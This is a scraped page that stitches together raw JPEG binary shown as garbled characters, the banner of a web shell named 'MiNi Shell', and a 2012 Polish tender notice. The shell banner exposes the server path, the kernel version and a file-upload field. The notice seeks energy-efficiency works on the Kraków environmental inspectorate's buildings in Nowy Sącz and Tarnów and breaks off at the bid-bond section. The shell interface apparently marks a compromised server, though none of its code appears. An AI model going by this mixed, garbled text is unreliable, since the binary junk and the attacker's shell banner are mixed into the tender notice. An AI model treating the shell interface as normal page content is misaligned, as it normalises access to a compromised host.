JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121029/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20121029/422794-N-2012.html

<p class="kh_header"><b>Kraków: zaprojektowanie i wykonanie robót budowlanych zwiększających efektywność energetyczną budynków Wojewódzkiego Inspektoratu Ochrony Środowiska w Krakowie - Delegatury w Nowym Sączu i Tarnowie</b><br>
<b>Numer ogłoszenia: 422794 - 2012; data zamieszczenia: 29.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Inspektorat Ochrony Środowiska w Krakowie , Plac Szczepański 5, 31-011 Kraków, woj. małopolskie, tel. 012 4224895, 4213469, faks 012 4223612.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.krakow.pios.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> zaprojektowanie i wykonanie robót budowlanych zwiększających efektywność energetyczną budynków Wojewódzkiego Inspektoratu Ochrony Środowiska w Krakowie - Delegatury w Nowym Sączu i Tarnowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA:
1.Przedmiotem zamówienia jest zaprojektowanie i wykonanie robót budowlanych zwiększających efektywność energetyczną budynku administracyjno-laboratoryjnego  Wojewódzkiego Inspektoratu Ochrony Środowiska w Krakowie - Delegatura w Tarnowie oraz  zaprojektowanie i wykonanie robót budowlanych zwiększających efektywność energetyczną budynku administracyjno-laboratoryjnego  Wojewódzkiego Inspektoratu Ochrony Środowiska w Krakowie - Delegatura w Nowym Sączu. 
	Szczegółowy opis przedmiotu zamówienia zawierają:
	-  dokumentacja projektowa w odniesieniu do budynku administracyjno - laboratoryjnego  Wojewódzkiego Inspektoratu Ochrony Środowiska w Krakowie - Delegatura w Nowym Sączu, 
	- Programy Funkcjonalno-Użytkowe dla obydwu budynków Wojewódzkiego Inspektoratu Ochrony Środowiska w Krakowie - Delegatury w Tarnowie i w Nowym Sączu, stanowiące załączniki do SIWZ.
	Roboty budowlane wykonywane będą w czynnych obiektach. 
2.Zamówienie obejmuje:
2.1.Zamówienie dla zwiększenia efektywności energetycznej budynku Delegatury
	 w Nowym Sączu:
1.Wykonanie robót budowlanych polegających na ociepleniu ścian budynku na podstawie Projektu Budowlano-wykonawczego Termomodernizacja ścian budynku Wojewódzkiego Inspektoratu Ochrony Środowiska Delegatura w Nowym Sączu sporządzonego w kwietniu 2009r - Projektant: mgr inż. Przemysław Loesch. Zamówienie obejmuje również uzyskanie
(opracowanie) aktualizacji ww. Projektu do wymagań aktualnych przepisów prawa oraz obecnego stanu obiektu, a także sporządzenie dokumentacji projektowej wraz z jej uzgodnieniem dotyczącym odtworzenia urządzeń budowlanych (instalacji gazów technicznych i instalacji odgromowej) zlokalizowanych na ścianach zewnętrznych budynku, których odtworzenie jest wynikiem realizacji ocieplenia ścian budynku.
2. Zaprojektowanie i wykonanie robót budowlanych zgodnie z wymaganiami i opisem
przedmiotu zamówienia zawartymi w Programie Funkcjonalno-Użytkowym w zakresie:
a) modernizacji kotłowni gazowej z wymianą kotła i instalacją solarną, w tym dla potrzeb centralnej ciepłej wody (Ccw) wraz z robotami towarzyszącymi - (demontażowymi, rozbiórkowymi, budowlanymi, instalacyjnymi sanitarnymi i instalacji gazowej oraz technologicznymi, elektrycznymi i AKP). 
Wykonanie instalacji solarnej (kolektory słoneczne) dla potrzeb Ccw przy współpracy 
z instalacją kotłową- (wraz z urządzeniami i instalacjami towarzyszącymi).
b) przebudowy dachu polegającego na wykonaniu 5 kpl. konstrukcji wsporczej dla	posadowienia na dachu solarów.
c) wymiany instalacji wewnętrznej C.O. polegającej na wymianie instalacji centralnego	ogrzewania (piony, poziomy, podejścia  odpowietrzenia, grzejniki , zawory).
d) modernizacji instalacji wentylacyjnej polegającej na modernizacji istniejącej wentylacji nawiewno-wywiewnej wraz z odzyskiem ciepła. Instalacja winna 	posiadać urządzenia schładzające i grzewcze.
Zamówienie obejmuje również:
a)	roboty rozbiórkowe i demontażowe urządzeń i instalacji,
b)	ponowny montaż elementów nie podlegających wymianie,
c)	roboty związane z zabezpieczeniami, osłonami elementów zewnętrznych pomieszczeń, urządzeń, instalacji nie wchodzących w zakres robót budowlanych lub wymaganych przepisami - realizacja robót w czynnym obiekcie,
d)	wywóz i utylizacja materiałów pochodzących z rozbiórek i demontaży jako
nie nadające się do ponownego użytku ,
e)	wykonanie koniecznych pomiarów, odbiorów, rozruchów wymaganych         odpowiednimi przepisami
Zamówienie obejmuje także:
a)	uzyskanie (opracowanie) aktualizacji inwentaryzacji budowlanej i instalacyjnej pomieszczeń kotłowni dla stanu obecnego obiektu, oraz sporządzenie dokumentacji projektowej wraz z jej uzgodnieniem dotyczącym modernizacyjnych robót odtworzeniowych urządzeń budowlanych i instalacyjnych 	zlokalizowanych w kotłowni, których roboty odtworzeniowe są wynikiem realizacji kotłowni (instalacje elektryczne, gazowe itp.),
b)	uzyskanie (opracowanie) aktualizacji inwentaryzacji budowlanej stanu obecnego dachu budynku dla celów projektowych  oraz sporządzenie dokumentacji projektowej wraz z jej uzgodnieniem dotyczącym posadowienia konstrukcji solarów (kolektorów) oraz odtworzenia urządzeń budowlanych będących wynikiem realizacji kolektorów  np. inst. odgromowej, pokrycia dachu z elementami jego konstrukcji itp.,
c)	uzyskanie (opracowanie) aktualizacji inwentaryzacji budowlanej i instalacyjnej instalacji wewnętrznej C.O. do celów projektowych pomieszczeń budynku,
d)	uzyskanie (opracowanie) aktualizacji inwentaryzacji budowlanej i instalacyjnej  dla celów projektowych, pomieszczeń stanu obecnego obiektu oraz sporządzenie dokumentacji projektowej wraz z jej uzgodnieniem dotyczącym elementów instalacji zasilania elektrycznego i AKP wentylacji oraz związanych z tą modernizacją robót odtworzeniowych - budowlanych i instalacyjnych zlokalizowanych w  obrębie instalacji wentylacji, których wykonanie jest wynikiem realizacji wentylacji (instalacje elektryczne, wod-kan, gazowe itp.),
e)	sprawowanie nadzoru autorskiego co do wykonanej dokumentacji projektowej w toku realizacji zadania
3. Zamówienie obejmuje również uzyskanie w imieniu Zamawiającego wszelkich niezbędnych decyzji administracyjnych, zezwoleń, uzgodnień i opinii, w szczególności:
a)	prawomocnej decyzji pozwolenia na budowę ( jeśli będzie wymagana),
lub
b)	dokonanie w imieniu Zamawiającego zgłoszenia do Organu Administracji Budowlanej zamiaru wykonania robót nie wymagających decyzji pozwolenia  na budowę i uzyskanie w tej sprawie prawomocnej decyzji lub  postanowienia tego Organu o braku sprzeciwu co do zamiaru wykonywania tych robót.
(Art. 29 ust.2 pkt 1 w związku z Art. 30 ust.1 pkt 2 ustawy z dnia 7 lipca
1994 roku Prawo Budowlane (Dz. U. z 2010 r. Nr 243, poz. 1623,  z późn. zm. zwanej dalej Prawem budowlanym)
2.2. Zamówienie dla zwiększenia efektywności energetycznej budynku Delegatury 
w Tarnowie.
Zaprojektowanie i wykonanie robót budowlanych zgodnie z wymaganiami i opisem	 przedmiotu zamówienia zawartymi w Programie Funkcjonalno-Użytkowym w zakresie:
1. Modernizacji kotłowni wraz z wymianą kotła :
a)	wymiana kotła na bardziej energooszczędny z uwzględnieniem zapotrzebowania na ciepłą wodę,
b)	modernizacja urządzeń technologicznych kotłowni celem dostosowania do nowej energooszczędnej technologii , DTR urządzeń  oraz aktualnych norm i przepisów,
c)	roboty budowlane, elektryczne i automatyka  związane ze zmianą technologii kotłowni i jej modernizacją, robotami demontażowymi urządzeń i instalacji oraz modernizacją instalacji wody, gazu, elektrycznej (prace dostosowawcze 	do nowych kotłów i urządzeń towarzyszących),   
Zamówienie obejmuje również:
d)	roboty rozbiórkowe i demontażowe urządzeń i instalacji,
e)	ponowny montaż elementów nie podlegających wymianie,
f)	roboty związane z zabezpieczeniami, osłonami elementów zewnętrznych pomieszczeń, urządzeń, instalacji nie wchodzących w zakres robót budowlanych lub wymaganych przepisami - realizacja robót w czynnym obiekcie,
g)	wywóz i utylizacja materiałów pochodzących z rozbiórek i demontaży jako
nie nadające się do ponownego użytku ,
h)	z uwagi na wymogi sterowania  automatycznego AKP kotłowni - wykonanie
płukania całej instalacji rurowo-grzejnikowej oraz założenie termozaworów na grzejnikach,
i)	wykonanie koniecznych pomiarów, odbiorów, rozruchów wymaganych         odpowiednimi przepisami
Zamówienie obejmuje także: uzyskanie (opracowanie) aktualizacji inwentaryzacji	budowlanej i instalacyjnej pomieszczeń kotłowni dla stanu obecnego obiektu, oraz 	sporządzenie dokumentacji projektowej wraz z jej uzgodnieniem dotyczącym 		modernizacyjnych robót odtworzeniowych urządzeń budowlanych i instalacyjnych
zlokalizowanych w kotłowni, których roboty odtworzeniowe są wynikiem realizacji kotłowni (instalacje elektryczne, gazowe itp.). 
2.Instalacji solarnej dla ciepłej wody, a w szczególności:
a) instalację solarną:
     - wykonanie wzmocnień pod baterie 5 kolektorów,
     - montaż kolektorów słonecznych próżniowych  5 szt. na stropodachu, 
     - wykonanie instalacji sanitarnej towarzyszącej i montaż urządzeń związanych 
z instalacją solarną,
    - roboty budowlane związane z instalacją kolektorów w zakresie prac rozbiórkowych, wzmacniających i odtworzeniowych pokrycia  dachowego,   obróbek blacharskich,
     - wywóz i utylizacja materiałów pochodzących z rozbiórek i demontaży jako 
nie nadające się do ponownego użytku,
- wykonanie koniecznych pomiarów, odbiorów, rozruchów wymaganych odpowiednimi przepisami,
b) instalację ciepłej wody:
     - wykonanie orurowania połączeniowego kolektory i kotłownia,
     - doprowadzenie ciepłej wody do pomieszczeń przewidzianych
       do zasilania w ciepłą wodę,
     - demontaż starych urządzeń : termy elektryczne i gazowe,
     - roboty związane ze zmianą układu instalacji ciepłej wody,
     - wywóz i utylizacja materiałów pochodzących z rozbiórek i demontaży
       jako nie nadające się do ponownego użytku ,
     - wykonanie koniecznych pomiarów, odbiorów, rozruchów wymaganych
        odpowiednimi przepisami .
Zamówienie obejmuje również uzyskanie (opracowanie) aktualizacji inwentaryzacji budowlanej stanu obecnego - dla celów projektowych:
- pomieszczeń budynku w zakresie budowlanym i instalacyjnym dla celów instalacji ciepłej wody;
- dachu budynku dla celów projektowych  oraz sporządzenie dokumentacji 	projektowej wraz z jej uzgodnieniem dotyczącym posadowienia konstrukcji 	solarów (kolektorów) oraz odtworzenia urządzeń budowlanych będących 	wynikiem realizacji kolektorów  np. inst. odgromowej, pokrycia dachu z elementami jego konstrukcji itp.
3. Modernizacji instalacji wentylacyjnej, a w szczególności:
a)	wykonanie instalacji nawiewnej (urządzenia i kanały) z wymiennikiem krzyżowym wraz ze schładzaniem i grzaniem powietrza,
b)	wykonanie instalacji wywiewnej (urządzenia i kanały) z odzyskiem ciepła,
c)	montaż urządzeń wentylacyjnych i ich uzbrojenia,
d)	roboty elektryczne zasilające urządzenia wentylacyjne i sterujące,
e)	roboty związane z modernizacją układów wentylacyjno-grzewczych.
Zamówienie obejmuje również uzyskanie (opracowanie) aktualizacji inwentaryzacji 	budowlanej i instalacyjnej  dla celów projektowych, pomieszczeń stanu obecnego obiektu, oraz sporządzenie dokumentacji projektowej wraz z jej uzgodnieniem dotyczącym elementów instalacji zasilania elektrycznego i AKP wentylacji oraz związanych z tą modernizacją robót odtworzeniowych - budowlanych i instalacyjnych zlokalizowanych w obrębie instalacji wentylacji, których wykonanie jest wynikiem realizacji wentylacji (instalacje elektryczne, wod-kan, gazowe itp.). 
	4. Izolacji termicznej ścian zewnętrznych piwnic, obejmującej w szczególności:
a)	wykonanie izolacji termicznej ścian piwnic wg technologii systemowej oraz norm obowiązujących w tym zakresie,
b)	naprawa izolacji p.wilgociowej dla spełnienia warunków termoizolacyjności
ścian podziemia (ściana nie może być wilgotna), 
c)	roboty budowlano-instalacyjne towarzyszące w zakresie izolacji ścian podziemia, zapobiegające nawilgacaniu ścian i pogorszeniu termoizolacyjności oraz  spowodowane zwiększoną grubością ścian. 
W tym zakresie przewidzieć: 
a)	odtworzenie przyściennego odprowadzenia wody opadowej (cz. podziemna  pozioma od rynien do przełącza kanalizacji burzowej),
b)	odtworzenie istniejących szachtów,
c)	odtworzenie nawierzchni wraz z  opaską przewietrzającą itd.
Zamówienie obejmuje również uzyskanie (opracowanie) aktualizacji inwentaryzacji budowlanej stanu obecnego - dla celów projektowych.
5. Termomodernizację budynku obejmującą:
		a)  termomodernizację elewacji wraz z tynkiem:
-  roboty budowlane termoizolacyjne w zakresie wykonania ocieplenia całości elewacji styropianem i wykonania tynków cienkowarstwowych na mokro    systemowych oraz wymiana stolarki okiennej (naświetla) nad klatką schodową.
 -  roboty budowlane towarzyszące w zakresie wymiany parapetów, obróbek 
     blacharskich, orynnowania i rur spustowych,
 - roboty uzupełniające w zakresie demontażu i odtworzenia elementów zewnętrznych montowanych na elewacji (instalacja gazów technicznych, daszki, podpory, odgromienie, okratowanie  itp.), 
- roboty związane z zabezpieczeniami, osłonami, elementów zewnętrznych pomieszczeń, urządzeń, instalacji nie wchodzących w zakres robót budowlanych lub wymaganych przepisami - realizacja robót na czynnym  obiekcie.
b) termomodernizacja stropu piwnic i stropodachu
-  roboty budowlane termoizolacyjne w zakresie wykonania ocieplenia całości   stropu piwnic przez ocieplenie od wewnątrz pomieszczeń z uwzględnieniem wielkości ocieplenia w zależności od parametrów  użytkowych pomieszczenia,
-  roboty budowlano-uzupełniające w zakresie demontażu i odtworzenia instalacji 
i urządzeń lokalizowanych na sufitach,
- roboty związane z zabezpieczeniami, osłonami, elementów zewnętrznych pomieszczeń , urządzeń, instalacji nie wchodzących w zakres robót budowlanych lub wymaganych przepisami - realizacja robót w czynnym  obiekcie,
-  roboty budowlane termoizolacyjne w zakresie wykonania docieplenia części podłogowej stykającej się z gruntem, w zakresie określonym w części graficznej Programu Funkcjonalno-Użytkowego.
Zamówienie obejmuje również uzyskanie (opracowanie) aktualizacji inwentaryzacji budowlanej stanu obecnego - dla celów projektowych.
6. Zamówienie obejmuje także :
a) sprawowanie nadzoru autorskiego co do wykonanej dokumentacji projektowej w toku realizacji zadania
b) uzyskanie w imieniu Zamawiającego wszelkich niezbędnych decyzji administracyjnych, zezwoleń, uzgodnień i opinii, w szczególności:
- prawomocnej decyzji pozwolenia na budowę (jeśli będzie wymagana),
lub
- dokonanie w imieniu Zamawiającego zgłoszenia do Organu Administracji 	Budowlanej zamiaru wykonania robót nie wymagających decyzji pozwolenia  na 	budowę i uzyskanie w tej sprawie prawomocnej decyzji lub  postanowienia tego 	Organu o braku sprzeciwu co do zamiaru wykonywania tych robót.
(Art. 29 ust.2 pkt. 1 w związku z art. 30 ust.1. pkt 2 ustawy z dnia 7 lipca 1994 r. Prawo Budowlane (Dz. U. z 2010 r. Nr 243, poz. 1623,  z późn. zm., zwanej   dalej Prawem budowlanym).
2.3. Wymagania w sprawie rozwiązań projektowych i usług związanych z realizacją robót w odniesieniu do budynku Delegatur w Nowym Sączu i Tarnowie.
1.Zamówienie obejmuje sporządzenie Projektów Budowlanych i Wykonawczych w zakresie wymaganym Rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25  kwietnia 2012 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2012 r. poz.462) , sporządzenie  przedmiarów robót oraz uzyskanie w imieniu Zamawiającego wszelkich niezbędnych decyzji administracyjnych, zezwoleń, uzgodnień i opinii, w szczególności:
a)	uzyskania z Organu Administracji Budowlanej zarejestrowanego  dziennika budowy lub od Zamawiającego zarejestrowanego  Zeszytu Budowy dla robót nie objętych decyzją pozwolenia na budowę;
b)	zgłoszenie do Powiatowego Inspektora Nadzoru Budowlanego rozpoczęcia robót, na których wykonanie uzyskano decyzję pozwolenia na budowę;
c)	zgłoszenie do Powiatowego Nadzoru Budowlanego zakończenia robót, o ile wynika to z przepisów lub decyzji pozwolenia na budowę;
d)	uzyskanie prawomocnej decyzji pozwolenia na użytkowanie, o ile wynika to z przepisów lub decyzji pozwolenia na budowę;
2. Sporządzenie i przekazanie ( wraz ze zgłoszeniem zakończenia przedmiotu umowy)
Zamawiającemu:
a)	kart gwarancyjnych,
b)	instrukcji użytkowania, w tym dla robót oraz urządzeń i osprzętu,
c)	świadectw charakterystyki energetycznej.
3.Jeżeli w dokumentacji przetargowej dotyczącej zamówienia, w jego opisie wymienione są nazwy handlowe, znaki towarowe, patenty lub pochodzenie należy traktować to jako przykładowe określenie, Zamawiający dopuszcza składanie ofert  równoważnych, zgodnie z parametrami technicznymi i użytkowymi określonymi w dokumentacji projektowej lub
Programie Funkcjonalno-Użytkowym. Wykonawca, który powołuje się na rozwiązania
równoważne opisywanym przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego dostawy, usługi lub roboty budowlane spełniają wymagania określone przez Zamawiającego.	
4.Wykonawca zobowiązany jest dokonać z Zamawiającym -  przez zakończeniem prac
projektowych- roboczych uzgodnień rozwiązań projektowych wszystkich części i zakresów opracowań projektowych objętych opisem przedmiotu zamówienia. Na wniosek Wykonawcy Zamawiający zorganizuje w terminie 7-miu dni, licząc od dnia zgłoszenia, naradę uzgadniającą. Wykonawca do zgłoszenia załączy w formie elektronicznej (format PDF) rysunki i opisy rozwiązań. 
Zamawiający ma prawo zgłoszenia umotywowanych zastrzeżeń i uwag do proponowanych rozwiązań ze wskazaniem podstawy wynikającej z opisu przedmiotu zamówienia lub przepisów. Wykonawca zobowiązany jest w pracach projektowych uwzględnić te uwagi i zalecenia.
5. Raportowanie Zamawiającemu  o postępie prac, obejmujące:
a)	raport miesięczny, w terminie 7-miu dni po zakończeniu każdego miesiąca,
b)	raport końcowy, w terminie zgłoszenia zakończenia robót.
Szczegółowe wymagania dotyczące raportowania zawarte są w Projekcie Umowy stanowiącej załącznik do SIWZ.
6. Wykonanie usług demontażu, wyniesienia i ponownego wniesienia do wskazanych przez Zamawiającego miejsc ( pomieszczeń) urządzeń, osprzętu i umeblowania z  pomieszczeń objętych robotami. Wydzielenie i zabezpieczenie dróg dla pracowników i petentów Inspektoratu. Oznakowanie stref wykonywania robót.
Zabezpieczenie pomieszczeń, urządzeń, osprzętu, otworów okiennych i drzwiowych,umeblowania przed czynnikami wynikającymi z prowadzonych robót. Wykonanie poprawek budowlanych i instalacyjnych na istniejących urządzeniach i obiektach ( ściany, stropy, posadzki itp.) wynikłych w trakcie wykonania robót.
3. Wspólny Słownik Zamówień (CPV):
71320000-7 Usługi inżynieryjne w zakresie projektowania
45100000-8 Przygotowanie terenu pod budowę
45110000-1 Roboty w zakresie burzenia i rozbiórki. Roboty ziemne.
45111200-0 Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne
45111100-9 Roboty w zakresie burzenia
45111220-6 Roboty w zakresie usuwania gruzu
45200000-9 Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych
45230000-8 Roboty budowlane w zakresie budowy rurociągów
45231000-5 Roboty budowlane w zakresie budowy rurociągów
45231100-6 Ogólne roboty budowlane związane z budową rurociągów
45231110-9 Układanie rurociągów
45300000-0 Roboty w zakresie instalacji budowlanych
45310000-3 Roboty w zakresie instalacji elektrycznych
45311000-0 Roboty w zakresie przewodów instalacji elektrycznych oraz opraw elektrycznych
45316000-5 Instalowanie systemów oświetleniowych i sygnalizacyjnych
45320000-6 Roboty izolacyjne
45321000-3 Izolacja cieplna
45330000-9 Hydraulika i roboty sanitarne
45331000-6 Instalacje cieplne wentylacyjne i konfekcjonowanie powietrza
45333000-0 Roboty instalacyjne gazowe
45331100-7 - instalowanie centralnego ogrzewania
45331000-6 - instalowanie urządzeń grzewczych
45000000-7 - roboty budowlane
45300000-0 roboty instalacyjne w budynkach
45400000-1 roboty wykończeniowe w zakresie obiektów budowlanych
45421000-4 - roboty w zakresie stolarki budowlanej
45430000-0 - pokrywanie podłóg i ścian
45440000-3 - roboty malarskie i szklarskie
45450000-6 - Roboty budowlane wykończeniowe, pozostałe
45331000-6 - Instalacje cieplne
45311100-1 Roboty w zakresie przewodów instalacji elektrycznej.
4. W ramach realizacji zamówienia Wykonawca opracuje kompletną dokumentację projektową niezbędną do wykonania robót. 
W szczególności do zadań Wykonawcy należy:
a)	sporządzenie projektów budowlano-wykonawczych oraz przedmiarów robót;
b)	uzyskanie niezbędnych opinii i uzgodnień do opracowań projektowych 
c)	obsługa geodezyjna i geologiczna,
d)	projekty organizacji ruchu ( o ile będą  wymagane)
e)	wykonanie robót budowlanych i montażowych,
f)	dostarczenie kompletu oznakowań, instrukcji z zakresu bhp i ochrony przeciwpożarowej, wymaganych przepisami szczegółowymi dla prawidłowej realizacji oraz eksploatacji wykonanych robót oraz dla dostarczonych urządzeń,
g)	przeprowadzenie wymaganych prób i badań oraz uzyskanie w imieniu Zamawiającego pozwolenia na użytkowanie ( o ile będą wymagane),
h)	wykonanie instrukcji obsługi, eksploatacji, bhp i p.poż. niezbędnych dla prawidłowej eksploatacji wykonanych obiektów budowlanych,
i)	opłaty za zajęcie pasa drogowego ,opłaty za nadzory obce i  badania wymagane dla uzyskania efektu i pozwolenia na użytkowanie itp.,
j)	inwentaryzację powykonawczą ( o ile będzie wymagana), 
k)	wykonanie tablic informacyjnych zgodnie z wymaganiami Prawa Budowlanego.
5. Szczegóły opisu przedmiotu zamówienia, charakterystykę wymagań Zamawiającego, charakterystyczne parametry określające zakres robót zawarte są:
a) w odniesieniu do budynku Delegatury w Nowym Sączu- oprócz w/wymienionych 	
w pkt.3.2.1..SIWZ- w Programie Funkcjonalno-Użytkowym ( aktualizacja), opracowanym przez mgr inż. Jacka Wojnara z sierpnia 2012r., stanowiącym załącznik do SIWZ.
b) w odniesieniu do budynku Delegatury w Tarnowie - oprócz w/wymienionych w 	pkt.3.2.2. SIWZ - w Programie Funkcjonalno-Użytkowym (aktualizacja), opracowanym przez inż. Rajmunda Schefflera z sierpnia 2012r., stanowiącym załącznik do SIWZ.
6.    Zamawiający żąda wskazania w ofercie części zamówienia których wykonanie     Wykonawca zamierza powierzyć  podwykonawcom.
Wielkość zamówienia poniżej kwot określonych w przepisach wydanych na podstawie art. 11, ust. 8 ustawy prawo zamówień publicznych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 45.10.00.00-8, 45.11.00.00-1, 45.11.12.00-0, 45.11.11.00-9, 45.11.12.20-6, 45.20.00.00-9, 45.23.00.00-8, 45.23.10.00-5, 45.23.11.00-6, 45.23.11.10-9, 45.30.00.00-0, 45.31.00.00-3, 45.31.10.00-0, 45.31.60.00-5, 45.32.00.00-6, 45.32.10.00-3, 45.33.00.00-9, 45.33.10.00-6, 45.33.30.00-0, 45.33.11.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wysokość wadium.
a)  Wykonawca  zobowiązany  jest  zabezpieczyć  swą  ofertę  wadium w  kwocie  
50 000  zł (słownie: pięćdziesiąt  tysięcy złotych),
